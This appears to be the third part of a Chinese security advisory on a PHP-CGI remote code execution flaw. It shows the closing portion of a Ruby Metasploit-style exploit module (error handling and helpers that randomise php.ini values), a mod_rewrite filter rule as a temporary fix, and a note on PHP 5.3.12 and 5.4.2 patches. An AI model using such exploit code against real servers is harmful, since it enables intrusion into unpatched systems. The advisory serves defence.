CGI远程任意代码执行漏洞(3)

rescue ::Interrupt
            raise $!
        rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
            print_error("The target service unreachable")
        rescue ::OpenSSL::SSL::SSLError
            print_error("The target failed to negotiate SSL, is this really an SSL service?")
        end
    end

def rand_php_ini_false
        [ "0", "off", "false" ].sort_by{rand}.first
    end

def rand_php_ini_true
        [ "1", "on", "true" ].sort_by{rand}.first
    end

end

建议:
--------------------------------------------------------------------------------
临时解决方法:

使用RewriteRule来过滤请求:

RewriteRule规则如下

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

厂商补丁:

PHP
---
目前厂商已经发布了5.3.12及5.4.2两个最新版本,但有报告说并没有正确修复这个安全问题,请密切关注厂商网站下载最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwzxpg.html